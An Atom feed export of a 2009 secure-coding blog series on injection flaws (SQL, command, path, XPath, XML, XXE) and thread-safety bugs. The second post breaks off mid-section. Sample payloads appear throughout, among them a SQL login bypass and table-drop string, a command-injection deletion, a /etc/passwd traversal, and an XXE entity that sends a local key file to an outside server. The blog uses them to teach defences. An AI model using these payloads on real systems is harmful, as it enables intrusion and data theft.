<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:gd="http://schemas.google.com/g/2005" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;DE4ASHs5fCp7ImA9Wx5QEUs.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399</id><updated>2010-08-30T13:15:49.524+02:00</updated><title>The Kalistick Blog</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://blog.kalistick.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://blog.kalistick.com/" /><author><name>Kalistick</name><uri>http://www.blogger.com/profile/02839053763564835377</uri><email>noreply@blogger.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>12</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/kalistick_blog_en" /><feedburner:info uri="kalistick_blog_en" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;CUUEQnYzeip7ImA9WxNaEUk.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-2271627769141673872</id><published>2009-11-25T11:00:00.005+01:00</published><updated>2009-11-25T11:00:03.882+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-25T11:00:03.882+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><category 
scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Empirical overview of security vulnerabilities [3/4]</title><content type="html">&lt;p&gt;
The third post of &lt;a href="http://blog.kalistick.com/2009/11/empirical-overview-of-security.html"&gt;this series&lt;/a&gt; on security vulnerabilities addresses code injection issues.
&lt;/p&gt;

&lt;h2&gt;Code injection&lt;/h2&gt;
&lt;p&gt;
  Code injection is probably one of the best-known security vulnerabilities among developers, yet our analyses
  show it remains &lt;strong&gt;a major cause&lt;/strong&gt; of security issues.
&lt;/p&gt;

&lt;p&gt;
  Code injection aims to take control of a command or a query through a parameter that is not plain data but contains code, which is then executed without any check. It is among the security holes that are easiest to exploit, even for a non-expert, and its consequences can be extremely serious, such as the retrieval or destruction of confidential data.
&lt;/p&gt;

&lt;p&gt;
  An example with a SQL query in C#:
&lt;/p&gt;
&lt;pre name="code" class="csharp:nocontrols"&gt;
  string query = "SELECT * FROM user "
    + "WHERE login='" + paramLogin 
    + "' AND password='" + paramPassword 
    + "'";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.ExecuteNonQuery();
  }
&lt;/pre&gt;


&lt;p&gt;
  If the parameter &lt;code&gt;paramPassword&lt;/code&gt; is a form field and the user enters &lt;em&gt;' OR '1'='1&lt;/em&gt;, the password condition is simply bypassed. And to destroy data, the user could try something like: &lt;em&gt;'; DROP TABLE user; --&lt;/em&gt; ...
&lt;/p&gt;
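
&lt;p&gt;
  To make the mechanism concrete, here is a minimal Java sketch that only builds the query string, without any database access. The class and method names are hypothetical and serve illustration only; the concatenation is the same as in the C# example:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public class InjectionDemo
{
  // Builds the query by naive concatenation, as in the vulnerable code
  static String buildQuery(String paramLogin, String paramPassword)
  {
    return "SELECT * FROM user "
      + "WHERE login='" + paramLogin
      + "' AND password='" + paramPassword
      + "'";
  }

  public static void main(String[] args)
  {
    // Value typed by the attacker into the password field
    System.out.println(buildQuery("admin", "' OR '1'='1"));
  }
}
&lt;/pre&gt;
&lt;p&gt;
  The printed query is &lt;code&gt;SELECT * FROM user WHERE login='admin' AND password='' OR '1'='1'&lt;/code&gt;. Since &lt;code&gt;AND&lt;/code&gt; binds more tightly than &lt;code&gt;OR&lt;/code&gt;, the condition is true for every row.
&lt;/p&gt;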

&lt;p&gt;
  In terms of code analysis, we distinguish two levels of severity, depending on where the parameters come from:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;the value comes from a &lt;strong&gt;method parameter or a class attribute&lt;/strong&gt;. We cannot assert that there is a security issue, because the value may have been checked beforehand. A risk remains, however, because the query becomes dangerous as soon as the method is reused elsewhere with unchecked input.
&lt;pre name="code" class="csharp:nocontrols"&gt;
public User authenticate(string paramLogin, string paramPassword)
{
  ...
  
  string query = "SELECT * FROM user "
    + "WHERE login='" + paramLogin 
    + "' AND password='" + paramPassword 
    + "'";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.ExecuteNonQuery();
  }
  
  ...
}
&lt;/pre&gt;
  &lt;/li&gt;
  &lt;li&gt;the value comes &lt;strong&gt;directly from an HTTP parameter&lt;/strong&gt; (such as a form field). In that case it is almost certainly a real security hole:
&lt;pre name="code" class="csharp:nocontrols"&gt;
public User authenticate()
{
  ...
  
  string query = "SELECT * FROM user "
    + "WHERE login='" + Request["login"]
    + "' AND password='" + Request["password"] 
    + "'";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.ExecuteNonQuery();
  }
  
  ...
}
&lt;/pre&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;
This flaw is mainly known for SQL queries, but we often forget that it applies to other areas too. The usual recommendations for protecting against code injection are:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;strong&gt;validate input data&lt;/strong&gt; (e.g. a login should not contain quotes)
  &lt;li&gt; systematically &lt;strong&gt;escape special characters&lt;/strong&gt; such as quotes
  &lt;li&gt; or better, use &lt;strong&gt;parameterized queries&lt;/strong&gt;, which take care of this escaping automatically
&lt;/ul&gt;

&lt;h3&gt;SQL Injections and derivatives&lt;/h3&gt;
&lt;p&gt;
  The SQL injection examples presented above also apply to alternative query technologies:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;HQL language for Java persistence framework &lt;a href="https://www.hibernate.org"&gt;Hibernate&lt;/a&gt;
  &lt;li&gt;JPQL language for Java persistence specification &lt;a href = "http://java.sun.com/javaee/technologies/persistence.jsp"&gt;JPA&lt;/a&gt;
  &lt;li&gt;generic query language &lt;a href="http://msdn.microsoft.com/en-us/library/bb308959.aspx"&gt;LINQ&lt;/a&gt; for C#
  &lt;li&gt; ...
&lt;/ul&gt;

&lt;p&gt;
  Injection becomes possible as soon as a query is built by &lt;strong&gt;concatenating&lt;/strong&gt; parameters directly. You can manually escape special characters such as quotes, but the best solution is generally to use &lt;strong&gt;parameterized queries&lt;/strong&gt;, which are available in most technologies. Besides handling special characters, these queries format parameters according to their data type, and may sometimes improve performance by caching the structure of a query before its parameters are set.
&lt;/p&gt;
&lt;pre name="code" class="csharp:nocontrols"&gt;
public User authenticate()
{
  ...
  
  string query = "SELECT * FROM user "
    + "WHERE login=@login AND password=@password";
 
  using (SqlCommand cmd = new SqlCommand(query, someConnection))
  {
    cmd.Parameters.AddWithValue("@login", Request["login"]);
    cmd.Parameters.AddWithValue("@password", Request["password"]);

    cmd.ExecuteNonQuery();
  }
  
  ...
}
&lt;/pre&gt;

&lt;p&gt;
  We also recommend the following two actions:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;never show SQL errors&lt;/strong&gt; directly to the user; otherwise, an attacker could use them to find flaws in the queries
  &lt;li&gt;&lt;strong&gt;restrict the privileges&lt;/strong&gt; of the account used for the database connection, in order to limit harmful actions, for example by prohibiting changes to the database schema
&lt;/ul&gt;

&lt;h3&gt;Command Injection&lt;/h3&gt;
&lt;p&gt;
  Another area in which we detect code injection opportunities is the &lt;strong&gt;execution of command lines&lt;/strong&gt;. Imagine a generic web service that launches a tool through a command line and passes it a parameter taken from the HTTP request:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
  @Override
  protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException
  {
    String param = req.getParameter("param");
    Process process = Runtime.getRuntime().exec("c:\\someTool.bat " + param);
    ...
  }
&lt;/pre&gt;

&lt;p&gt;
  By setting the parameter to a value such as &lt;em&gt;0 | del c:\xxx&lt;/em&gt;, an attacker could cause serious damage to the system! Although the Java API used here covers most cases by treating each term of the command as an argument of the first program, it remains necessary to check the contents of the HTTP parameter.
&lt;/p&gt;
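
&lt;p&gt;
  As an illustration, the check could look like the following sketch. The class name, the method name and the whitelist pattern are assumptions made for this example (we suppose the tool only needs short alphanumeric arguments); only the tool path comes from the servlet shown earlier:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
import java.util.regex.Pattern;

public class SafeToolLauncher
{
  // Assumption: legitimate arguments are short and alphanumeric
  private static final Pattern ALLOWED = Pattern.compile("[A-Za-z0-9_-]{1,32}");

  // Returns a ProcessBuilder ready to be started, or rejects the parameter
  static ProcessBuilder prepare(String param)
  {
    if (param == null || !ALLOWED.matcher(param).matches())
    {
      throw new IllegalArgumentException("Rejected parameter");
    }

    // Program and argument are passed separately, never as one concatenated string
    return new ProcessBuilder("c:\\someTool.bat", param);
  }
}
&lt;/pre&gt;
&lt;p&gt;
  Passing the argument separately avoids building a command string by hand, but since a batch file is interpreted by the Windows command processor, the whitelist remains the essential safeguard here.
&lt;/p&gt;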

&lt;h3&gt;Injection of a file path&lt;/h3&gt;
&lt;p&gt;
  Another type of injection that is easy to set up and rather dangerous consists in injecting a file path when the parameter is used to retrieve a file. For example, this JSP includes a copyright notice chosen according to the language given in an HTTP parameter:
&lt;/p&gt;
&lt;pre name="code" class="html:nocontrols"&gt;
&amp;lt;html&gt;
  ...
  &amp;lt;jsp:include page="copyrights/&amp;lt;%= request.getParameter("lang") %&gt;"/&gt;
  ...
&amp;lt;/html&gt;
&lt;/pre&gt;

&lt;p&gt;
  If the attacker sets the &lt;code&gt;lang&lt;/code&gt; parameter to a value such as &lt;code&gt;../../../../etc/passwd&lt;/code&gt;,
  the file is simply returned in the HTTP response. To avoid this vulnerability, use &lt;strong&gt;static includes&lt;/strong&gt; (&lt;code&gt;&amp;lt;%@include file="copyrights/fr"%&gt;&lt;/code&gt;), &lt;strong&gt;lock access to external / confidential files&lt;/strong&gt;, and, again, check &lt;strong&gt;parameters&lt;/strong&gt; before you use them.
&lt;/p&gt;
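
&lt;p&gt;
  When a dynamic path cannot be avoided, one possible check is to normalize the resulting path and verify that it stays inside the expected directory. The sketch below assumes a hypothetical &lt;code&gt;CopyrightResolver&lt;/code&gt; class and a &lt;code&gt;copyrights&lt;/code&gt; base directory, and relies on &lt;code&gt;java.nio.file&lt;/code&gt;, which is only available from Java 7 onwards:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
import java.nio.file.Path;
import java.nio.file.Paths;

public class CopyrightResolver
{
  // Hypothetical base directory holding one notice per language
  private static final Path BASE = Paths.get("copyrights").toAbsolutePath().normalize();

  static Path resolve(String lang)
  {
    if (lang == null)
    {
      throw new IllegalArgumentException("Missing language");
    }

    // normalize() collapses the ".." segments before the comparison
    Path candidate = BASE.resolve(lang).normalize();
    if (!candidate.startsWith(BASE))
    {
      throw new IllegalArgumentException("Path escapes the copyrights directory");
    }

    return candidate;
  }
}
&lt;/pre&gt;
&lt;p&gt;
  With this check, a value such as &lt;code&gt;fr&lt;/code&gt; is accepted, whereas &lt;code&gt;../../../../etc/passwd&lt;/code&gt; is rejected with an &lt;code&gt;IllegalArgumentException&lt;/code&gt;.
&lt;/p&gt;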

&lt;h3&gt;XPath Injection&lt;/h3&gt;
&lt;p&gt;
  XPath is a query language in the same vein as SQL, but applied to XML documents. The previous SQL query could be written in XPath as something like: &lt;code&gt;//users/user[login/text()='...' and password/text()='...']&lt;/code&gt;. The problem is &lt;strong&gt;identical to SQL injection&lt;/strong&gt;, but XPath implementations do not always offer an equivalent of parameterized queries. Here is an example with the standard Java API (Java 5.0 and later), which handles this case properly:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public void authenticate(String login, String password) 
  throws ParserConfigurationException, XPathExpressionException, IOException, SAXException
{
  XPath xpath = XPathFactory.newInstance().newXPath();
  xpath.setXPathVariableResolver(new AuthResolver(login, password));
  XPathExpression query = xpath.compile("//users/user[login/text()=$login and password/text()=$password]/id/text()");
  Document d = DocumentBuilderFactory.newInstance().newDocumentBuilder()
      .parse(new File("auth.xml"));
  
  String userId = query.evaluate(d);
  ...
}

private final static class AuthResolver implements XPathVariableResolver
{
  private final String login;
  private final String password;

  public AuthResolver(String login, String password)
  {
    this.login = login;
    this.password = password;
  }

  public Object resolveVariable(QName qName)
  {
    if ("login".equals(qName.getLocalPart()))
      return login;
    if ("password".equals(qName.getLocalPart()))
      return password;
    
    return null;
  }
}
&lt;/pre&gt;

&lt;h3&gt;XML Injections&lt;/h3&gt;
&lt;p&gt;
  XML is often used as an interchange format in SOA. Imagine a banking service that records account transactions from orders formatted as follows:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;order&gt;
  &amp;lt;accountId&gt;123&amp;lt;/accountId&gt;
  &amp;lt;amount&gt;10000&amp;lt;/amount&gt;
  &amp;lt;type&gt;debit&amp;lt;/type&gt;
&amp;lt;/order&gt;
&lt;/pre&gt;

&lt;p&gt;
  Now, imagine that this order is generated from an input form in which the user enters an amount with the value &lt;code&gt;0&amp;lt;/amount&amp;gt;&amp;lt;type&amp;gt;credit&amp;lt;/type&amp;gt;&amp;lt;amount&amp;gt;10000&lt;/code&gt;. The XML order becomes:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;order&gt;
  &amp;lt;accountId&gt;123&amp;lt;/accountId&gt;
  &amp;lt;amount&gt;0&amp;lt;/amount&gt;
  &amp;lt;type&gt;credit&amp;lt;/type&gt;
  &amp;lt;amount&gt;10000&amp;lt;/amount&gt;
  &amp;lt;type&gt;debit&amp;lt;/type&gt;
&amp;lt;/order&gt;
&lt;/pre&gt;

&lt;p&gt;
  Depending on how this XML document is read, the order could be recorded as a credit instead of a debit: this is the case when a DOM search is limited to the first element found.
&lt;/p&gt;

&lt;p&gt;
  This type of injection is easily prevented by &lt;strong&gt;validating&lt;/strong&gt; the XML document against a model (DTD or XSD Schema), in addition to the usual precautions (data verification or escaping of special characters). This is why we offer a rule requiring that an XML document be validated before it is parsed.
&lt;/p&gt;
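
&lt;p&gt;
  On the producing side, escaping can be delegated to the XML API instead of concatenating strings. The following sketch (the &lt;code&gt;OrderXmlBuilder&lt;/code&gt; class is hypothetical) builds the order with the standard DOM API and serializes it with a &lt;code&gt;Transformer&lt;/code&gt;, so that the user input is always written as text and never as markup:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
import java.io.StringWriter;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

public class OrderXmlBuilder
{
  static String buildOrder(String accountId, String amount, String type)
    throws ParserConfigurationException, TransformerException
  {
    Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder().newDocument();
    Element order = doc.createElement("order");
    doc.appendChild(order);
    addChild(doc, order, "accountId", accountId);
    addChild(doc, order, "amount", amount);
    addChild(doc, order, "type", type);

    // Serialization escapes the special characters found in text nodes
    Transformer transformer = TransformerFactory.newInstance().newTransformer();
    StringWriter out = new StringWriter();
    transformer.transform(new DOMSource(doc), new StreamResult(out));
    return out.toString();
  }

  private static void addChild(Document doc, Element parent, String name, String value)
  {
    Element child = doc.createElement(name);
    // The value is stored as a text node, whatever it contains
    child.appendChild(doc.createTextNode(value));
    parent.appendChild(child);
  }
}
&lt;/pre&gt;
&lt;p&gt;
  With the malicious amount shown above, the injected tags end up as escaped text inside the single &lt;code&gt;amount&lt;/code&gt; element, and the order keeps its only &lt;code&gt;type&lt;/code&gt; element. The amount should of course still be checked as a number before the order is processed.
&lt;/p&gt;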

&lt;h3&gt;XXE (XML eXternal Entity) Injections&lt;/h3&gt;
&lt;p&gt;
  Another type of injection is specific to XML (source: &lt;a
  href = "http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html"&gt;http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html&lt;/a&gt;) and relies on external entities, a mechanism for static inclusion in XML:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY secreteKey SYSTEM "file:/somedir/secreteKey" &gt;
] &gt; 
&amp;lt;root&gt;
  &amp;lt;node&gt;&amp;amp;secreteKey;&amp;lt;/node&gt;
&amp;lt;/root&gt;
&lt;/pre&gt;

&lt;p&gt;
  When the file is interpreted by an XML parser, the content of the &lt;code&gt;node&lt;/code&gt; element is dynamically replaced with the contents of the file declared by the external entity.
&lt;/p&gt;

&lt;p&gt;
  If this file comes from another system, it gives that system a way to access unprotected data. To view the data, the ill-intentioned system is either able to read the parsed XML file (e.g. an RSS feed sent to an aggregation server), or can even retrieve the data automatically via a second external entity pointing to a server it can access:
&lt;/p&gt;
&lt;pre name="code" class="xml:nocontrols"&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY secreteKey SYSTEM "file:/somedir/secreteKey" &gt;
&amp;lt;!ENTITY sendSecreteKey SYSTEM "http://someserver.com/?&amp;amp;secreteKey;" &gt;
] &gt; 
&amp;lt;root&gt;
  &amp;lt;node&gt;&amp;amp;sendSecreteKey;&amp;lt;/node&gt;
&amp;lt;/root&gt;
&lt;/pre&gt;

&lt;p&gt;
  The solution is simply &lt;strong&gt;not to accept external entities&lt;/strong&gt; in files coming from third parties and, of course, to protect your file system ...
&lt;/p&gt;
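
&lt;p&gt;
  With the standard Java DOM parser, one way to apply this is to refuse any document that declares a DOCTYPE. The sketch below is only one possible configuration: the &lt;code&gt;HardenedXmlParser&lt;/code&gt; class is hypothetical, and the feature name is the one defined by the Xerces parser on which the JDK implementation is based, so other parsers may require different settings:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class HardenedXmlParser
{
  static Document parse(String xml)
    throws ParserConfigurationException, SAXException, IOException
  {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    // Xerces feature: any DOCTYPE declaration makes the parsing fail,
    // which rules out external entities altogether
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    factory.setXIncludeAware(false);
    factory.setExpandEntityReferences(false);

    DocumentBuilder builder = factory.newDocumentBuilder();
    return builder.parse(new InputSource(new StringReader(xml)));
  }
}
&lt;/pre&gt;
&lt;p&gt;
  A document without DOCTYPE is parsed normally, whereas the two examples above are rejected with a &lt;code&gt;SAXException&lt;/code&gt; before any entity is resolved.
&lt;/p&gt;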

&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;
  Not all types of injection are listed here, but if there is only one thing to remember, it is this: systematically validate received data before using it!
&lt;/p&gt;

&lt;p&gt;
  &lt;strong&gt;To be continued...&lt;/strong&gt; The next post will conclude this series with a medley of other vulnerabilities regularly seen in Cockpit, some of which are surprising.
&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-2271627769141673872?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/2271627769141673872/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/11/empirical-overview-of-security_25.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2271627769141673872?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2271627769141673872?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/yqkmuCco17I/empirical-overview-of-security_25.html" title="Empirical overview of security vulnerabilities [3/4]" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/11/empirical-overview-of-security_25.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YEQXc9eip7ImA9WxNbFUg.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-358773503723756773</id><published>2009-11-18T16:45:00.001+01:00</published><updated>2009-11-18T16:45:00.962+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-18T16:45:00.962+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Empirical overview of security vulnerabilities [2/4]</title><content type="html">&lt;p&gt;
  The second post of &lt;a href="http://blog.kalistick.com/2009/11/empirical-overview-of-security.html"&gt;this series&lt;/a&gt; on security vulnerabilities addresses two distinct issues: concurrent access and object encapsulation.
&lt;/p&gt;

&lt;h2&gt;Concurrent access&lt;/h2&gt;
&lt;p&gt;
  This is one of the most difficult areas to master in development: at the design stage, because most of us have only one brain, and at the test stage, because simulating concurrent operations is often tricky to set up and even harder to reproduce. Concurrent access has an impact on several quality dimensions: reliability, performance, maintainability, but also security. Here are some examples.
&lt;/p&gt;

&lt;h3&gt;Sharing of attributes&lt;/h3&gt;
&lt;p&gt;
  One of the recurring problems in Java or C# development is the notion of &lt;strong&gt;thread safety&lt;/strong&gt;: can the object be used simultaneously by several threads or not? This information should be available in the API documentation, and misuse can lead to unpredictable results. Through &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit&lt;/a&gt;, we have lost count of the unsynchronized uses of Java formatting classes from the &lt;code&gt;java.text&lt;/code&gt; package, such as &lt;code&gt;java.text.SimpleDateFormat&lt;/code&gt;. Few Java developers know that, without synchronizing calls to these classes, they will sometimes get very strange results...
&lt;/p&gt;
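
&lt;p&gt;
  As an illustration, here is a minimal sketch of a formatter that can be shared safely between threads. It assumes Java 8 or later, where &lt;code&gt;java.time.format.DateTimeFormatter&lt;/code&gt; is immutable and thread-safe; the &lt;code&gt;DateLabels&lt;/code&gt; class is hypothetical. With older versions, calls to a shared &lt;code&gt;SimpleDateFormat&lt;/code&gt; have to be synchronized, or a new instance created for each use:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
import java.time.LocalDate;
import java.time.format.DateTimeFormatter;

public class DateLabels
{
  // DateTimeFormatter is immutable and thread-safe:
  // a single shared instance needs no synchronization
  private static final DateTimeFormatter DAY = DateTimeFormatter.ofPattern("yyyy-MM-dd");

  static String format(LocalDate date)
  {
    return DAY.format(date);
  }
}
&lt;/pre&gt;
&lt;p&gt;
  For example, &lt;code&gt;DateLabels.format(LocalDate.of(2009, 11, 25))&lt;/code&gt; returns &lt;code&gt;2009-11-25&lt;/code&gt;, whatever the number of threads calling it at the same time.
&lt;/p&gt;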

&lt;p&gt;
  Another example with a direct impact on security is related to the use of some web frameworks. To improve performance, many of them use &lt;strong&gt;instance pools&lt;/strong&gt; to provide the components handling HTTP requests. For example in Java: &lt;a href = "http://struts.apache.org/1.x/userGuide/building_controller.html"&gt;Struts (V1)&lt;/a&gt;, &lt;a href = "http://static.springsource.org/spring/docs/2.5.6/reference/mvc.html"&gt;Spring MVC&lt;/a&gt; or even &lt;a href = "http://tomcat.apache.org/tomcat-5.5-doc/servletapi/javax/servlet/http/HttpServlet.html"&gt;servlets&lt;/a&gt;. The same problem exists with C# frameworks such as &lt;a href = "http://blogs.msdn.com/benchr/archive/2008/09/03/does-asp-net-magically-handle-thread-safety-for-you.aspx"&gt;ASP.NET MVC&lt;/a&gt;.
&lt;/p&gt;

&lt;p&gt;
  The problem is that this pool mechanism is not always clearly explained in the documentation, and developers may not understand its consequences. In the worst case, information from different users gets mixed up.
&lt;/p&gt;

&lt;p&gt;
  An example with a servlet (the basic Java component handling an HTTP request):
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public class SomeServlet extends HttpServlet
{
  private Account account;

  @Override
  protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException
  {
    account = retrieveAccount(req);
    doSomething();
  }

  protected void doSomething()
  {
    String name = account.getName();
    ...
  }
}  
&lt;/pre&gt;

&lt;p&gt;
  This code stores information read from the HTTP request in an attribute of the servlet, then performs some operations in another method that uses the same attribute. The problem is that if a second request arrives before the &lt;code&gt;doSomething()&lt;/code&gt; method is called, the attribute will be &lt;strong&gt;replaced&lt;/strong&gt; with information related to the second request, because by default a servlet is served by a &lt;strong&gt;single shared instance&lt;/strong&gt;.
&lt;/p&gt;

&lt;p&gt;
  I remember working on a project for a world-renowned client where users sometimes complained about losing their context and seeing information belonging to other users. The cause was exactly this servlet attribute issue! Consequences were limited here because it was an intranet with information that was not confidential, but you can easily imagine the situation in critical environments such as banking applications.
&lt;/p&gt;

&lt;p&gt;
  So check your API documentation and &lt;strong&gt;track down attributes in components which are not thread-safe&lt;/strong&gt;. In web applications, data must be stored in the context of the request, the session or the application.
&lt;/p&gt;

&lt;h3&gt;Singletons&lt;/h3&gt;
&lt;p&gt;
  Although the use of singletons is being abandoned in favour of &lt;a href = "http://en.wikipedia.org/wiki/Dependency_injection"&gt;dependency injection&lt;/a&gt;, it remains a common pattern that is considered trivial to write. Yet our results show that more than one project in two contains poorly written singletons.
&lt;/p&gt;

&lt;p&gt;
  An example in C#, where the singleton is created on the first call (&lt;em&gt;lazy instantiation&lt;/em&gt;):
&lt;/p&gt;
&lt;pre name="code" class="csharp:nocontrols"&gt;
public sealed class BalanceHistory
{
  private static BalanceHistory INSTANCE;

  private BalanceHistory() { }

  public static BalanceHistory Instance
  {
    get
    {
      if (INSTANCE == null)
      {
        INSTANCE = new BalanceHistory();
      }
      
      return INSTANCE;
    }
  }
}     
&lt;/pre&gt;

&lt;p&gt;
  If the &lt;code&gt;Instance&lt;/code&gt; getter is called twice simultaneously, the singleton may be created twice: if both tests find the singleton to be null, they will both create a new instance, and the callers will work on distinct singletons (and the singleton created first will be lost)...
&lt;/p&gt;

&lt;p&gt;
  There are several ways to solve this problem:
&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;create the instance at declaration&lt;/strong&gt;: &lt;code&gt;private static BalanceHistory INSTANCE = new BalanceHistory();&lt;/code&gt;. This is usually the best solution: the instantiation actually takes place when the class is loaded, which for a singleton means at the first access to &lt;code&gt;Instance&lt;/code&gt;!
  &lt;li&gt;&lt;strong&gt;synchronize&lt;/strong&gt; the creation of the instance: in C# through &lt;code&gt;[MethodImplAttribute (MethodImplOptions.Synchronized)]&lt;/code&gt;, or via a &lt;code&gt;lock&lt;/code&gt; on a dedicated lock object 
  &lt;li&gt;use a pattern based on inner classes, cf. the &lt;a href = "http://en.wikipedia.org/wiki/Initialization_on_demand_holder_idiom"&gt;Initialization on demand holder idiom&lt;/a&gt; pattern 
  &lt;li&gt;use the &lt;a href="http://en.wikipedia.org/wiki/Double-checked_locking"&gt;Double-checked locking&lt;/a&gt; pattern, even though it usually causes more problems than it solves (we treat this pattern as forbidden in Cockpit)
&lt;/ul&gt;
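
&lt;p&gt;
  For Java, the pattern based on inner classes mentioned in the list can be sketched as follows. We reuse the &lt;code&gt;BalanceHistory&lt;/code&gt; name from the C# example; the &lt;code&gt;Holder&lt;/code&gt; class name is an arbitrary choice:
&lt;/p&gt;
&lt;pre name="code" class="java:nocontrols"&gt;
public final class BalanceHistory
{
  private BalanceHistory() { }

  // The nested class is only initialized on the first call to getInstance();
  // the JVM guarantees that this initialization runs once, in a thread-safe way
  private static final class Holder
  {
    private static final BalanceHistory INSTANCE = new BalanceHistory();
  }

  public static BalanceHistory getInstance()
  {
    return Holder.INSTANCE;
  }
}
&lt;/pre&gt;
&lt;p&gt;
  This keeps lazy instantiation without any explicit lock: all callers of &lt;code&gt;getInstance()&lt;/code&gt; receive the same instance.
&lt;/p&gt;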

&lt;h2&gt;Object Encapsulation&lt;/h2&gt;
&lt;p&gt;
  Protecting access to data is one of the basic principles of Object-Oriented Programming (OOP), but this does not mean that OOP solves this kind of problem by itself.
&lt;/p&gt;
  
&lt;h3&gt;Data accessibility&lt;/h3&gt;
&lt;p&gt;
